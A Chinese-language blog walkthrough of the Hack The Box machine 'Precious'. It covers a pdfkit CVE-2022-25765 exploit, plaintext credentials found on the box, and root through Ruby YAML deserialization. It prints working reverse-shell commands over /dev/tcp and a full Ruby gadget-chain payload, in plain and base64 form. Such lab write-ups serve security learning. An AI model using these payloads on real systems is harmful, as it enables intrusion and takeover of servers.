HTB-Precious

metafa1ica
  2025-08-02 18:42:46 2025-08-02 18:42:46 创建   2025-08-17 13:29:28 2025-08-17 13:29:28 更新    
1
2
3
ip='10.129.228.98'
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1| tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip

image

image

Phusion Passenger(R) 6.0.15

找了一圈这个玩意没洞啊

用exiftool看下生成的文件,用的pdfkit v0.8.6

image

pdfkit 0.8.6

有个CVE-2022–25765

https://www.exploit-db.com/exploits/51293

1
python poc.py -s 10.10.16.42 8989 -w http://precious.htb/ -p url

反弹shell成功了,但没啥权限

image

横向

在这里找到账号密码,也太扯了

1
enry:Q3c1AqGHtoI0aXAYFH

image

image

5e3b05e507ab5bfb3bb9106425d545d3

提权

接下来考虑提权了

image

/opt/update_dependencies.rb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

扔给Kimi,一下就给出了思路

1
2
echo -e '---\n!ruby/object:IO 2>&1 | /bin/bash -c "bash -i >& /dev/tcp/10.10.16.42/4444 0>&1"' > dependencies.yml
sudo /usr/bin/ruby /opt/update_dependencies.rb

可惜,并没有成功

首先找到文件路径为/opt/sample/dependencies.yml,并没有具体配置

image

从这抄个ruby反序列化的配置

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/Ruby.md

ruby版本为2.7.4p191

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id
         method_id: :resolve
1
2
echo LS0tCi0gIXJ1Ynkvb2JqZWN0OkdlbTo6SW5zdGFsbGVyCiAgICBpOiB4Ci0gIXJ1Ynkvb2JqZWN0OkdlbTo6U3BlY0ZldGNoZXIKICAgIGk6IHkKLSAhcnVieS9vYmplY3Q6R2VtOjpSZXF1aXJlbWVudAogIHJlcXVpcmVtZW50czoKICAgICFydWJ5L29iamVjdDpHZW06OlBhY2thZ2U6OlRhclJlYWRlcgogICAgaW86ICYxICFydWJ5L29iamVjdDpOZXQ6OkJ1ZmZlcmVkSU8KICAgICAgaW86ICYxICFydWJ5L29iamVjdDpHZW06OlBhY2thZ2U6OlRhclJlYWRlcjo6RW50cnkKICAgICAgICAgcmVhZDogMAogICAgICAgICBoZWFkZXI6ICJhYmMiCiAgICAgIGRlYnVnX291dHB1dDogJjEgIXJ1Ynkvb2JqZWN0Ok5ldDo6V3JpdGVBZGFwdGVyCiAgICAgICAgIHNvY2tldDogJjEgIXJ1Ynkvb2JqZWN0OkdlbTo6UmVxdWVzdFNldAogICAgICAgICAgICAgc2V0czogIXJ1Ynkvb2JqZWN0Ok5ldDo6V3JpdGVBZGFwdGVyCiAgICAgICAgICAgICAgICAgc29ja2V0OiAhcnVieS9tb2R1bGUgJ0tlcm5lbCcKICAgICAgICAgICAgICAgICBtZXRob2RfaWQ6IDpzeXN0ZW0KICAgICAgICAgICAgIGdpdF9zZXQ6IGlkCiAgICAgICAgIG1ldGhvZF9pZDogOnJlc29sdmU= |base64 -d > dependencies.yml
sudo /usr/bin/ruby /opt/update_dependencies.rb

成功执行了

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: /bin/bash -c 'bash -i >& /dev/tcp/10.10.16.42/4444 0>&1'
         method_id: :resolve
1
2
echo LS0tCi0gIXJ1Ynkvb2JqZWN0OkdlbTo6SW5zdGFsbGVyCiAgICBpOiB4Ci0gIXJ1Ynkvb2JqZWN0OkdlbTo6U3BlY0ZldGNoZXIKICAgIGk6IHkKLSAhcnVieS9vYmplY3Q6R2VtOjpSZXF1aXJlbWVudAogIHJlcXVpcmVtZW50czoKICAgICFydWJ5L29iamVjdDpHZW06OlBhY2thZ2U6OlRhclJlYWRlcgogICAgaW86ICYxICFydWJ5L29iamVjdDpOZXQ6OkJ1ZmZlcmVkSU8KICAgICAgaW86ICYxICFydWJ5L29iamVjdDpHZW06OlBhY2thZ2U6OlRhclJlYWRlcjo6RW50cnkKICAgICAgICAgcmVhZDogMAogICAgICAgICBoZWFkZXI6ICJhYmMiCiAgICAgIGRlYnVnX291dHB1dDogJjEgIXJ1Ynkvb2JqZWN0Ok5ldDo6V3JpdGVBZGFwdGVyCiAgICAgICAgIHNvY2tldDogJjEgIXJ1Ynkvb2JqZWN0OkdlbTo6UmVxdWVzdFNldAogICAgICAgICAgICAgc2V0czogIXJ1Ynkvb2JqZWN0Ok5ldDo6V3JpdGVBZGFwdGVyCiAgICAgICAgICAgICAgICAgc29ja2V0OiAhcnVieS9tb2R1bGUgJ0tlcm5lbCcKICAgICAgICAgICAgICAgICBtZXRob2RfaWQ6IDpzeXN0ZW0KICAgICAgICAgICAgIGdpdF9zZXQ6IC9iaW4vYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40Mi80NDQ0IDA+JjEnCiAgICAgICAgIG1ldGhvZF9pZDogOnJlc29sdmU= |base64 -d > dependencies.yml
sudo /usr/bin/ruby /opt/update_dependencies.rb

收工

image

50d0e33078e248e47949958ee1ae4164

  • 标题: HTB-Precious
  • 作者: metafa1ica
  • 创建于 : 2025-08-02 18:42:46
  • 更新于 : 2025-08-17 13:29:28
  • 链接: https://metafa1ica.github.io/post/041d853bdc7f/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
HTB-Precious
  1. pdfkit 0.8.6
  2. 横向
  3. 提权